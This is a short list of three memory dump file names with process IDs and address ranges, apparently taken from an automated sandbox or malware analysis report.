memory/5420-613-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5604-618-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp

memory/5604-619-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp